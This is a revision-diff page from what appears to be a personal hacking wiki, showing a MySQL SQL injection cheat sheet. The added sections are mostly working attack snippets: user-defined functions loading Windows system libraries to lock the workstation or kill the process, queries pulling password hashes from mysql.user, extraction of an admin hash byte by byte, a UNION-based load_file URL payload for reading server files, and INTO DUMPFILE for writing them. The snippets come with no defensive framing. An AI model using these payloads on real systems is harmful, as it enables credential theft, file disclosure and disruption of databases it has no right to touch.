Wiki

User Tools

Site Tools

Trace:
hacking:sql_injection:mysql:users

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision		Previous revision
hacking:sql_injection:mysql:users [2020/04/16 23:03] – created peterhacking:sql_injection:mysql:users [2020/07/15 09:30] (current) – external edit 127.0.0.1
Line 1: Line 1:
 ====== Hacking - SQL Injection - MySQL - Users ====== ====== Hacking - SQL Injection - MySQL - Users ======
 +
 +===== Users =====
  
 <code sql> <code sql>
Line 12: Line 14:
 SELECT ... INTO DUMPFILE SELECT ... INTO DUMPFILE
 </code> </code>
 +
 +----
 +
 +===== UDF (User-Defined Functions) =====
 +
 +<code sql>
 +create function LockWorkStation returns integer soname 'user32';
 +select LockWorkStation(); 
 +create function ExitProcess returns integer soname 'kernel32';
 +select exitprocess();
 +
 +SELECT USER();
 +SELECT password,USER() FROM mysql.user;
 +</code>
 +
 +----
 +
 +===== First byte of admin hash =====
 +
 +<code sql>
 +SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
 +</code>
 +
 +----
 +
 +===== Read File =====
 +
 +<code sql>
 +query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
 +</code>
 +
 +
hacking/sql_injection/mysql/users.1587078211.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki